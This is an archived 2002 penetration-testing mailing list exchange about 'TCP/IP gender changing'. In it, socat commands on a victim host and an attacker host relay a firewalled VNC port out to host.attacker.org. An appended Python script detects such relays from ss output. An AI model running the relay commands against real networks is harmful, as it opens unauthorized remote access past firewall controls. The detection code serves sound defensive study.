Penetration Testing mailing list archives
Re: TCP/IP GenderChanger
From: Gerhard Rieger <gerhard.rieger () dest-unreach com>
Date: Wed, 31 Jul 2002 21:51:22 +0200 (CEST)
[sorry if double]

You might use socat from http://www.dest-unreach.org/socat/ as "gender changer".

On your outside server host.attacker.org run it as double server:

    socat tcp-l:80 tcp-l:5900

or, for multiple connections, with access restrictions, logging etc:

    socat -d -d tcp-l:80,fork,range=host.victim.org/24,reuseaddr tcp-l:5900,range=localhost/32,reuseaddr

and on host.victim.org:

    socat tcp:localhost:5900 tcp:host.attacker.org:80

This scenario was one of socat's design goals, after I had to realize that netcat with its derivatives and the usual port forwarders could not easily be used for things like these.

regards
Gerhard Rieger

Ivan Buetler wrote:
Hi there,

The following article will discuss bidirectional inside-out attacks, inspired by netcat. The article discusses how to access a victim's VNC server behind a firewall, where the victim initiates connections to the attacker.

http://www.csnc.ch/downloads/docs/techdocs/TCP-IP_GenderChanger_CSNC_V1.0.pdf
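
Added example (not part of the original posts and not socat's own code): a defender-side check for the relay described above, which on the inside host shows up as a single process holding both a loopback connection to the VNC port and a connection to an off-host peer. The sample input is constructed in the shape of `ss -tnp` output; the watched-port set and the function names are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in the shape of `ss -tnp` output (not captured data).
SAMPLE = '''\
ESTAB 0 0 127.0.0.1:5900 127.0.0.1:41234 users:(("Xvnc",pid=900,fd=8))
ESTAB 0 0 127.0.0.1:41234 127.0.0.1:5900 users:(("socat",pid=4242,fd=5))
ESTAB 0 0 10.0.0.5:51514 203.0.113.10:80 users:(("socat",pid=4242,fd=6))
ESTAB 0 0 10.0.0.5:51720 198.51.100.7:80 users:(("firefox",pid=1200,fd=44))
LISTEN 0 5 0.0.0.0:5900 0.0.0.0:* users:(("Xvnc",pid=900,fd=7))
'''

# Assumption: local service ports that should never be bridged off-host.
WATCHED_LOCAL_PORTS = {5900}
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def split_endpoint(endpoint):
    """Split 'addr:port' (or '[v6addr]:port') into (ip_address, int port)."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)


def find_relays(ss_text, watched=WATCHED_LOCAL_PORTS):
    """Return {pid: info} for processes that are clients of a watched
    loopback port and also hold a connection to a non-loopback peer."""
    per_pid = defaultdict(lambda: {"name": None, "local": set(), "remote": set()})
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "ESTAB":
            continue  # only established connections have a concrete peer
        m = PROC_RE.search(fields[5])
        if not m:
            continue
        peer_ip, peer_port = split_endpoint(fields[4])
        entry = per_pid[int(m.group(2))]
        entry["name"] = m.group(1)
        if peer_ip.is_loopback and peer_port in watched:
            entry["local"].add(peer_port)
        elif not peer_ip.is_loopback:
            entry["remote"].add(f"{peer_ip}:{peer_port}")
    return {pid: e for pid, e in per_pid.items() if e["local"] and e["remote"]}


if __name__ == "__main__":
    for pid, e in find_relays(SAMPLE).items():
        print(pid, e["name"], sorted(e["local"]), "->", sorted(e["remote"]))
```

The VNC server itself and an ordinary web client are not flagged, because neither holds both kinds of connection in one process.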